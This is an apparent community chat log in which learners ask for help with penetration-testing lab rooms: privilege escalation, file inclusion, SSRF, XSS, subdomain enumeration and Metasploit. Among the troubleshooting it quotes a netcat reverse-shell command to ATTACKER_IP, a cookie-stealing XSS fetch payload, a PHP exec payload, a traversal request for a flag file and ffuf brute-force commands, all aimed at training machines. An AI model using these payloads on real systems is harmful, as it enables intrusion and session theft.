I am having a problem with the Windows Privilege Escalation room, the part of dll s. Everytime I run x86_64-w64-mingw32-gcc with the required parameters i get this as response:

x86_64-w64-mingw32-gcc -m64 -c -Os proxy.c -Wall -shared -masm=intel
-m64: command not found

Does anyone know what I am doing wrong?

woven pewter
#

@hardy lagoon can you show screenshot? its like its executing on a new line or something

lucid cliff
#

And they were never heard from again

hardy lagoon
#

It is all on the same line

#

-m64 is the output i get

#

x86_64-w64-mingw32-gcc -m64 -c -Os proxy.c -Wall -shared -masm=intel

#

Discord trims it, it is all on the same line

#

It does not recognize any of the parameters

earnest flower
hardy lagoon
#

Attackbox

earnest flower
#

Weird, because my first guess would have been on Kali and you just haven't installed the package.

hardy lagoon
#

Nope the package is indeed installed

#

A bit strange

#

I'll tryto uninstall it and reinstall again

earnest flower
#

Yeah, that's super weird. It ran just fine for me.

#

@hardy lagoon If you verify, you can post screenshots.

#

!docs verify

tiny bluffBOT
earnest flower
#

@robust sphinx This channel is for that path.

#

In the upper right hand corner of the task panel, you should see this button to start the machine. Press it, and then wait for the timer to finish loading and press the blue "Show Split View" button to access the machine.

wooden cosmos
#

can someone help me or explain what squid proxy is?

earnest flower
#

Looks like some kind of caching software. You tried Googling it first, I hope?

wooden cosmos
#

yes, but I couldn't find anything

earnest flower
#

So what did you find?

wooden cosmos
#

I've been stuck in it for a few days now ]

earnest flower
#

I mean, I just Googled it and got a general idea, so explain to me what you understand so we can figure out what you don't.

wooden cosmos
#

as I said, nothing

#

basically everything hahaha

earnest flower
#

Homie, you're gonna need to apply a little more effort than that to succeed in this game.

wooden cosmos
#

I tried to understand what it was about or what it was for but I couldn't find anything about it

earnest flower
wooden cosmos
# earnest flower

everything ok, I will research a little more and anything will come back to me later

#

thanks for the help

#

Port80-TCP:V=7.92%I=7%D=6/29%Time=62BCFB53%P=x86_64-unknown-linux-gnu%r

#

I managed to find this

earnest flower
wooden cosmos
#

I basically understood what it is for and what it does

earnest flower
#

So you're trying to find the version on your box or the latest release? Which question are you working on? That might help with context.

wooden cosmos
#

I am trying to find the box version, I am doing the beginning of the recognition course

woven pewter
peak hedge
#

hello guys I have a problem here in SSRF room from JR-penetration test path
the site in task two doesn't work at all there is no error appears or anything it just freezes

i tried to reset progress and remove the browser cookies but still nothing **

remote iris
peak hedge
#

the ( next ) button is working thou when i get to the final slide nothing happen that's the problem

remote iris
#

You need to use the correct url, working out the syntax from the task.

peak hedge
remote iris
#

What's your URL?

peak hedge
#

is it right?

remote iris
#

Almost.

peak hedge
#

but why there is no error appears any more

remote iris
#

Nothing happens with that link, at all.

#

Take out the square brackets.

#

That's all you need to do. πŸ™‚

peak hedge
#

nothing happen

#

thank you for your time but still nothing happen

#

Server Requesting bar at the bottom show nothing too

remote iris
#

Please refresh the room.

#

And open the site again and go to the end slide.

and paste the command you're using for me please.

remote iris
peak hedge
#

it did not work

remote iris
#

What is your url?

remote iris
#

You didn't take out the part I asked you to.

#

Take out the second https:// only

peak hedge
#

yes it worked thank you so much i was so stupid there was a space at the end

#

i forgot about that

#

thanks for your time again

remote iris
#

No problem!

Next time, if you want to supply screenshots you can do this by verifying.

#

!docs verify

tiny bluffBOT
final garden
maiden stratus
final garden
#

The same problem seems to be on the Attack Machine from TryHackMe

maiden stratus
#

try just using python instead of python3.9

#

or just remove python altogether and it'll select whatever it wants

final garden
#

I installed python2 and now is working, thank you πŸ™‚ I think they should also update the command from the instructions

earnest flower
#

When something doesn't work, figuring out why is just as important as making it work.

hollow plinth
#

hey can anyone help me on task 7?

remote iris
#

...Of which room?

cold wolf
lusty path
#

Hey guys! Im finishing up on the Windows Privilege Escalation and am on Task 7 Abusing vulnerable software. I was following on really well until the end where it says to "Modify the proxy DLL's payload with a reverse shell to get the flag for this machine"

I'm really stuck here, it might be because it's late at night but I'm just not sure what it means by telling me to Modify the proxy DLL's payload. How would I go about doing that with a reverse shell?

lusty path
#

I got myself onto that route a bit ago actually. Im just struggling with what command exactly to put

#

should I be keeping it as outputting to the output.txt file or just scrap that output and put C:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT ??

#

ah, okay sweet

#

Been playing around with how to phrase it for the last like 20 mins. Thank you! Will try it now and see

lusty path
#

I still can't seem to get it to work

#

would anyone mind looking at a screenshot of what I've written and verifying it for me?

#

nevermind. I ran it one more time and it seemed to have worked. Ty all for help!

golden wigeon
long crag
#

Hi,

I am on the NMAP course, task 14, final question - "Deploy the ftp-anon script against the box. Can Nmap login successfully to the FTP server on port 21? "

#

for whatever reason, i have port 21 closed, reason is reset ttl 64

#

so my answer should be "no" but i get marked as incorrect

#

has there been an update or am I doing something wrong?

idle bison
long crag
next lanceBOT
#

Gave +1 Rep to @idle bison

edgy berry
#

Im on the lfi course and I'm stuck at the final task of gaining a rce from rfi. From what I found it looks like I need to use netcat to establish rce. But im still figuring out what ip to use for it to work?

#

I'm using my own machine

elder girder
edgy berry
#

How can i see it?

elder girder
#

ip a

#

then the ip under the interface called tun 0

edgy berry
#

Ah i see

#

is the vpn works like a lan? meaning I can just serve file in python http server and the site will get it?

elder girder
#

yes

edgy berry
#

ah so great. wished I knew this before. I ended up doing it very ineffeciently using 3rd party site lol

elder girder
#

oh, lol

edgy berry
#

thanks finally made it pass this room

elder girder
#

no worries

wooden cosmos
errant sinew
#

If there is an error on one of the Q&A's who do we send that to?

sage current
#

if you are sure of that then you can report it in #room-bugs

errant sinew
#

Possibly, but the command I entered that was marked correct won't work in real life. Or at least I've never made it work like that lol.

sage current
#

refresh the page and check what the answer field says

#

if it has changed it was due to answer tolerance

errant sinew
#

Ahhh, lol I refreshed and it add the flag for me. Still marked as correct.

#

Never seen that happen on here thanks

sage current
#

answer tolerances for the winu

violet otter
#

The Bell-La Padula Model is not anything anyone should be teaching to junior pentesters. Its not even a valid modern security model.

#

Also, the Biba model is equally out of date. Why are we teaching 50 year old security models

#

Or if anything, atleast call them out for what they are under modern terms: mandatory access controls

errant sinew
#

Wow after that whole Linux priv esc challenge the capstone challenge was super easy!! And I didn't think I was retaining anything. Finally feel like I'm making progress!

quick dome
#

So I'm on the File Inclusion room Task 8, challenge 2. And for some reason I get an error when trying to open a Burp Browser to intercept the request. If I try to do it with Burp installed on my own computer it just doesn't catch the Cookies header so I can't really edit anything. Anyone know what I'm doing wrong?

shadow echo
quick dome
#

Will try πŸ‘

modest arch
#

Hi, I am stuck at content discovery, task 2 and 4. The givenwebsite is unable to connect

shadow echo
modest arch
shadow echo
modest arch
#

From attack box

shadow echo
modest arch
#

Waw

#

Thanks

lucid cliff
#

Woot, finished the path!

elder sluice
#

Hi, I am unable to understand "Virtual Host" part of "Subdomain Enumeration". It is written that a particular server can host multiple websites and "Host" header in a web request will tell the server which website the client is requesting. What I assume will happen after sending a request with a particular host header for eg - "Host: admin.acmeitsupport.com", Firstly a DNS request will be made which will get the public IP address of admin.acmeitsupport.com, and then the web request is sent to that IP address.
It is also explained that sometimes Server may use a private DNS server through which we can get the IP address of domains that were not hosted on publically accessible DNS results for eg - "dev.acmeitsupport.com"
Now we may use DNS Bruteforce to send many request to a domain changing the subdomain part in Host header - "Host: dev.acmeitsupport.com", after which DNS request will be made to get IP address "dev.acmeitsupport.com", but if it is not publicly available we are not going to get any IP address, how are we able to determine if we discover a new website or not? Thanks

odd glade
#

Hello guys I need help on Windows Privilege Escalation task 4 can't figure out how to find the flag. Can somebody please give me a hint

odd glade
elder sluice
#

Thanks you for your answer.
"dev.acmeitsupport.com" and "admin.acmeitsupport.com" both if exist will have separate IP right except if they are on virtual host? If they are on a virtual host, they will have same IP address, but that IP needs to be resolved by a client DNS server, but how did it bypassed DNS in this process?

For eg - We have 2 websites - 1. admin.acmeitsupport.com - this exists
2. dev.acmeitsupport.com - this also exists but in a private DNS server

In first case, if we make first request to "admin" subdomain, the request will look like -
GET / HTTP/1.1
Host: admin.acmeitsupport.com

Now the browser will send a DNS request to get the IP of admin.acmeitsupport.com which it will resolve to some IP as it was publicly accessible, after which it will send the request and we will get the response.

In second case, if we make request to "dev" subdomain, the request will look like -
GET / HTTP/1.1
Host: dev.acmeitsupport.com

This time browser will again send a DNS request but it will not be able to resolve this to an IP as there is no record for this domain in the DNS zone and the request will fail.
So we will not be able to tell if that particular website exists or not.

I am really sorry if this is a very silly question and my understanding is not up to the mark, please help me out. I am pretty sure that I am missing something on TCP 3 way handshake where it already created a session with a particular web server and changing "Host" header is reliable after that but what will be that IP address or rather which server will it connect to and how does it know which server to connect without Host header? Thank you

next lanceBOT
#

Gave +1 Rep to @steel nymph

elder sluice
#

Thank you so much.
Now I understood, we are just adding it to hosts file which will be pointing to a web server which we already know, after which we will send request to that same IP address but changing the "Host" header which causes that web server to respond to the client with the website we want.
I think my English comprehension is little weak. Now rereading your first answer, I am able to understand it. Thank you again and will definitely look up on the terms you provided.

next lanceBOT
#

Gave +1 Rep to @steel nymph

earnest flower
#

I don't recall whether the AlwaysInstallElevated works for the room, but I know altering the schtask does.

#

Also, you probably don't want to be in the habit of sharing full screenshots, as it's a good way to accidentally leak info from the background windows on your screen.

odd glade
#

I don't usually share a full screenshot but thanks for informing me

idle bison
#

@proud ocean don't ask the same thing across several channels, it is spam

proud ocean
#

i just wanted to make sure i was gonna get help

modest arch
#

I am currently on Linux PrivEsc : Task 9 Privilege Escalation: Cron Jobs. I set up the NC listener and adjusted the backup.sh file in home directory. Crontab hasnt run the file. What am I missing. I sat and waited for 30 min. Nothing.... I ensured that cron is running.

modest arch
next lanceBOT
#

Gave +1 Rep to @shadow echo

warm blade
#

I'm currently on Metasploit: Exploitation room and i have to use to eternalblue module to exploit a machine. I set the RHOST option and then use run command it doesn't work for some reason i've tried on the attack box and my local machine. It gives the output:

shadow echo
warm blade
#

I also tried to change the LHOST to machine IP but that doesn't work either.

shadow echo
# warm blade Here you go

You aware that you have set LHOST and RHOSTS to the same IP ?
What is LHOST and what is RHOSTS supposed to be ?

warm blade
shadow echo
warm blade
shadow echo
#

If so, could you try changing the LPORT to 4455 for example ?

warm blade
warm blade
shadow echo
#

So either way, I would restart the target machine, then put the RHOSTS to the new target machine IP and try again

warm blade
shadow echo
warm blade
#

Thank you very much for the help

south olive
#

Hey Guys, I have no modules at /opt/metasploit-framework-[version]/modules

#

Any guide please Do i have to download modules sperat**y

valid cape
south olive
#

I'm using Ubuntu in my laptop

valid cape
#

Check
/usr/share/metasploit-framework/modules

valid cape
south olive
#

I have downloaded

#

/opt/metasploit-framwork exists but not modules dir

valid cape
#

From where did you download MSF?

#

Is it running on typing
MSF console?

south olive
#

msfconsle is running

south olive
#

i think from Ubuntu repo

valid cape
south olive
#

Ohh-k brother

valid cape
south olive
#

Thanks for your time. Will let you once done.

valid cape
#

But I recommend that it is better to download Kali

#

Or use parrot OS instead

#

Because parrot OS is multipurpose

#

You can use parrot OS for multi tasking
And pentesting and as a home desktop

south olive
#

They come with pre installed. But i want to do all things manually. For the sake of fundamental understanding.

south olive
#

Once I will be able to do these manually then I will shift to parrot or kali

valid cape
#

But not recommended
Because you have to just install the things and setting up

valid cape
south olive
south olive
#

Anyhow. Thanks @valid cape

next lanceBOT
#

Gave +1 Rep to @valid cape

south olive
#

For your precocious time and guide.

valid cape
#

Best of luck
You can DM me anytime you want
I'll answer you whenever I'll be free

south olive
#

That's great. ☺️

broken flame
#

is it just me or is foxyproxy not working in chrome/brave?

remote iris
#

Have you got it set up?

remote iris
broken flame
#

i tried it in brave for the first burp suite box but it won't download the certificate

#

but in firefox it does and the ui looks different/better anyway

#

but firefox isn't my main browser :\ @remote iris

remote iris
#

Did you set it the host and port?

broken flame
#

yeah ofc 127.0.0.1 host and 8080 port

#

but the chromium version looks like its underdeveloped anyway and missing some features

remote iris
#

I don't use the chomuim that Burp boots, I use the chrome.

broken flame
#

yeah but chrome and brave are obviously

#

chromium browsers

#

so the same foxyproxy

#

version

remote iris
#

Yeah, I don't look at the UI, I just browse.

broken flame
#

is that so

remote iris
#

Yeah, no point looking at the UI, it doesn't tell me anything useful other than it's connected.

strange holly
#

What type of information could be stored in txt records that will useful during a Pentest ?

strange holly
idle bison
strange holly
idle bison
#

You should have googled it and read those.

strange holly
#

How do you define 'Non path' questions as my questions relate to Task 4 of Passive Recon section of Jr Pentesting ?

idle bison
#

If it's a question about a room in the path, state which room and question.
In this case, it's pretty tangential

earnest flower
#

Just a note for the Windows Privesc room at the end of the path: a walkthrough has been published.

modest arch
#

Hi friends πŸ™‚

#

Could I please get some help with regards to Intro to Web Hacking -> Walking an application?

#

specifically the Debugger section

#

When I use Firefox I can only see bootstrap.min.js, jquery.min.js and site.js under assets.

#

with Chrome or Edge browsers I see additional ones like bootstrap.min.css and style.css but I can't find flash.min.js no matter which browsers I use

#

Thank you in advance...

hollow talon
#

Hey I am having trouble on the windows priv escalation. I am on task 7 and when I try to edit the druvansync exploit file it says I don’t have permission. What am I missing?

#

Anybody help me out here?

modest arch
#

im trying to access tryhackme machine but with no use

#

consider im using the openvpn and the ip is correct and working

maiden stratus
modest arch
#

room Subdomain Enumeration

maiden stratus
modest arch
#

I need to enter this command ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.200.108

#

isn't the path in local ?

maiden stratus
modest arch
#

he didn't say

#

but he gave me an ip and the path in the local right?

maiden stratus
#

what's path, what's local

modest arch
#

wait

#

wait a min

#

I think im stupid

#

Nevermind I'm stupid

#

@maiden stratus thanks

next lanceBOT
#

Gave +1 Rep to @maiden stratus

modest arch
#

and sorry for wasting your time

maiden stratus
#

No problem πŸ™‚

modest arch
#

I'll be more careful next time

nocturne carbon
#

Hello,
I am stuck on Windows Privilege Escalation - Task 7 Abusing vulnerable software.
I cannot get into the Administrator directory and I cannot 'type' the flag.txt file. Access is Denied…
I created a new user account and added it to the administrator local group (pwnd).
Any help would be appreciated.

#

SOLVED! I was able to get to it through the GUI. Then I realized my command prompt want runnin as admin

stray cape
earnest flower
#

@solid folio @stray cape

cold wolf
#

Hey all, task 5 of Linux priv Esc.

I understand exactly what needs to be done, however, I don't understand why it needs to be done this way.

Why can't I just wget the exploit to the server?
Why do I need to transfer it via a Python Html server?

Thanks in advance πŸ™‚

#

This is what I was starting to suspect

#

cheers lassi πŸ™‚

#

I figured it was either some kind of IPS blocking exploit-db or simply no internet access

#

time for a dumb question.
Is there a command I should have run or something to figure that out? Or should have the fact wget wasn't working been enough for me to figure it out

#

guess I could try pinging google

#

ah okayokay cool, cheers mate

#

just wasn't sure if I was missing something more complicated

#

I always tend to over complicate these things lmao

modest arch
#

Hey guys, having trouble getting output from ffuf. Can someone help me out? In room Authentication Bypass/Brute Force.

I did create a file valid_usernames.txt and it is saved in /Desktop. While in the same directory as the file that was creating, I run this command

|| ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.119.23/customers/login -fc 200
||

The following returns

:: Method : POST
:: URL : http://10.10.119.23/customers/login
:: Wordlist : W1: valid_usernames.txt
:: Wordlist : W2: /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=W1&password=W2
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 200


:: Progress: [40/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0
:: Progress: [194/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
:: Progress: [353/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
0 ::

Not providing me with the desired output, the username/password?? Thank you!

teal swan
#

god this looks so confusing

modest arch
#

hello, im havinf trouble submitting my answers. it says answer in format *********** and idk what that means

modest arch
shadow echo
#

It's supposed to only hold the usernames and not any other data like size, status etc.

shadow echo
modest arch
#

ohh, thank you

modest arch
next lanceBOT
#

Gave +1 Rep to @shadow echo

craggy field
#

was the Win_PrivEsc part for the JR_Pentest updated or replaced by new Win_PrivEsc room?

warm badge
#

the new one seems a lot more thorough

craggy field
#

so the old one was completely removed...

craggy field
craggy field
#

done finally...took me like 1hr. kinda tricky

marble hamlet
craggy field
marble hamlet
craggy field
marble hamlet
craggy field
#

the old one

marble hamlet
#

thats old old....

craggy field
#

ya it is..took screenshot from YT videos lol

marble hamlet
#

this is the one i was working on...

craggy field
south olive
#

Hey Mates, I am facing an issue with msfvenom, I'm not able to generate windows x64 reverse shell payload do anyone have any idea of this error

south olive
#

Ohh Thanks @idle bison

next lanceBOT
#

Gave +1 Rep to @idle bison

south olive
marble hamlet
#

anyone recommend CTF/challenges after completing Windows PrivEsc....

burnt blaze
#

File Inclusion . Task 8 Challenge
Capture Flag2 at /etc/flag2

Why I can't get access to admin page ? I changed cookie Cookie: THM=Guest to THM=admin and still nothing

tiny bluffBOT
burnt blaze
#

ok

#

oh i got it thank you

#

welcome admin now. ty

next lanceBOT
#

Gave +1 Rep to @steel nymph

undone jetty
#

in the SSRF room, why does the directory traversal trick require an x to be used infront of the /../

sonic vault
#

in the Linux PrivEsc room under the Cron Jobs module I thinks its good if we also add pspy as a tool to check for ongoing cron jobs that arent listed in the system crontab.

modest arch
#

please help

remote iris
#

With what?

modest arch
#

So here I need to the to:
create cmd.txt file and contains <?php print exec('hostname); ?> code
create webserver python3 -m http.server

#

and finally host my web server here

#

I did all that but the flag not appearing why?

#

wait a min please

#

i took this url in my browser field and worked!

#

wait

#

wait please

modest arch
#

didn't work

#

I did everything

#

should i just copy the answer ?

#

ok last question

#

You mean this ip right?

#

ummm

#

but

#

when i run it on my windows and open the sites ( tryhackme ask me to )

#

i open it with mv kali linux and vpn running on windows and it works

#

but ok i will download openvpn on vm kali and try

#

ok i'll try

#

thanks I'll try tomorrow

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

@steel nymph I set things up

#

but I don't know how to show my vpn ip address

#

with no use πŸ™‚

#

and I can't find the port

#

waitttttttttttttttttt

#

it worked

#

it workkkkkkkkkkkkked

#

finally :

#

you know I was working on this for 2 days trying not be a child and ask

#

and failed tho πŸ™‚

#

anyway

#

Thanks again

next lanceBOT
#

Gave +1 Rep to @steel nymph

fair heath
#

whats happening peeps

lost epoch
#

Is anyones β€œAcme IT Support” web page not working today? I’m doing the username enumeration room and it’s not working. I tried it on another device and I’m getting the same result.

orchid grove
#

hello everyone . can someone please help me in cracking capstone challenge

#

i m trying to use exploit 42887.c

#

CVE-2017-1000253

#

I have compiled it and tranferred it in to attacking machine

#

but when i m running it. its not giving me root previliges

rustic totem
orchid grove
#

Linux privilage excellation

sage current
#

you will need to do some password cracking but other then that everything you need is on the target already

orchid grove
#

I already did that... Cracked pass for missy and read file by suid bit..

idle bison
#

Is it root suid?

orchid grove
#

Its solved but i want to do it by metasploit as i m not satisfied

idle bison
#

You're going to need a much more modern exploit than that.

orchid grove
idle bison
#

That's not what I asked though

sage current
#

yeah for missy it is ||base64|| suid binary exploitation

#

but for root you need something else

orchid grove
#

I m kinda week in exploits so i wanna do it that way

placid glade
#

Hello,
As part of the path for jr pentest im doing 'https://tryhackme.com/room/metasploitexploitation'

I understand i need to use the eternalblue vuln to move on, however, for me its says the machine is not vulnerable to eternalblue. I also run an nmap with --script=vuln and i don't get what i used to get with other machines where i could see the vulnerability on eternalblue. Any suggestions?

burnt blaze
#

Cross-site Scripting , Task 8
While using the TryHackMe AttackBox, let's set up a listening server using Netcat:
user@machine$ nc -nlvp 9001
Now that we've set up the method of receiving the exfiltrated information, let's build the payload.
</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

so what IP should i use now ? site ip ? 10.10.78.174 and port 9001? I tried 8000/9001 with a different ip and did not work

Console showing ~# nc -nlvp 9001
Listening on [0.0.0.0] (family 0, port 9001)
and nothing else

lost epoch
honest steeple
lost epoch
next lanceBOT
#

Gave +1 Rep to @rustic totem

prisma estuary
#

Anyone from netherlands here? Pm me

shadow echo
prisma estuary
#

πŸ‘

hidden juniper
#

LFI chall3: question. After going down many rabbit holes (truncation, php wrappers, etc) i understood also looking at the channel (thanks for this community!) Now the question: why if I user BurpSuite repeater to teamper the method and post the dir traversal URL it does not get output?

#

<b>Warning</b>: include(.php)

#

and if I user CURL instead I see the warning with the attempt of dir traversal? <b>Warning</b>: include(../../../etc/flag3.php)

#

in short: curl shows that it attempts to read the flag file while BurpSuite no...I spent so much time with BurpSuite! maybe it's me not using it properly

#

anyone with an answer?

#

thanks I got it: POST /challenges///chall3.php?file=welcome HTTP/1.1

Host: 10.10.123.120

User-Agent: curl/7.83.1

Accept: /

Content-Length: 26

Content-Type: application/x-www-form-urlencoded

Connection: close

file=../../../etc/flag3%00

#

that little bottom line there makes all the difference

#

indeed I need some basics here. Thank again for the prompt support πŸ™‚

next lanceBOT
#

Gave +1 Rep to @honest steeple

tidal belfry
#

jr pentester path boxes are awesome

#

meterpreter module +1

steel temple
#

Just completed my junior pentester pathway! Why is it that when interviewing for entry level offensive roles I get asked that I need more experience to qualify? I’ve spent 10 years in I.T. and 2 years already in DevSecOps with a focus in cyber risk

tidal belfry
#

tryhackme is experience too?

idle bison
#

No

sage current
#

but it can classify as a relevant hobby and mark that you are working on bettering yourself by learning

burnt blaze
#

Do i enter ip server somewhere for this ? nc -nlvp 9001
It still did not work

root@ip-10-10-165-215:~# nc -nlvp 9001
Listening on [0.0.0.0] (family 0, port 9001)

Xss works fine and i have entered script etc.. to grab the cookie
<script>fetch('http://{10.10.165.215:9001}?cookie=' + btoa(document.cookie) );</script>

#

I tried to run server on 8000 it did not work either just showing nothing

burnt blaze
idle bison
#

It's not a valid url

modest arch
#

Hello everyone
I'm at the last q in Cross-site Scripting room and the q is:
What is the value of the staff-session cookie?
He asked me to use netcat but I used instead pytnon -m http.server
So I need to create a support ticket on Acme IT Support
here I need to put in the ticket content a payload
</textarea><script>fetch('http://127.0.0.1:8000?cookie=' + btoa(document.cookie) );</script>
soooo when a staff member press it, his cookies sent to my server ( Python server )
but when I decoded the cookie by https://www.base64decode.org/ ( and by the way it's c2Vzc2lvbj0wNzBmZTJjZTZmMWNlMGJmZGE1N2E0NzE2ODE3MGVjOA== )
The result is :
session=070fe2ce6f1ce0bfda57a47168170ec8
BUT IT IS NOT WORKING WHY? IS the IP address wrong or what?
and thanks

idle bison
#

Is that your cookie?

modest arch
#

You mean the result ?

#

after i created the ticket with the payload

#

i pressed it

#

so the cookie sent to me

#

me right?

#

ok cause i want the cookie to sent to me right?

#

yep

#

so what is the ip

#

is the machine one?

#

idk

#

I think yeah

idle bison
#

What does 127.0.0.1 mean?

#

What machine does it refer to?

modest arch
#

my localhost

idle bison
#

If I use 127.0.0.1 on my laptop, does it refer to your machine?

modest arch
#

no

#

to mine

idle bison
#

So, the admin's cookie wouldn't be sent to you

#

It'd be sent to their localhost

modest arch
#

and what is the solution

#

i know

idle bison
#

I believe in you, think about it

modest arch
#

yeah yeah yeah

#

ummmmmmmmm

#

first I need to now what is my ip

#

not the localhost but my own ip

#

right?

#

don't tell me

#

gonna give it a shot

#

ok i'll try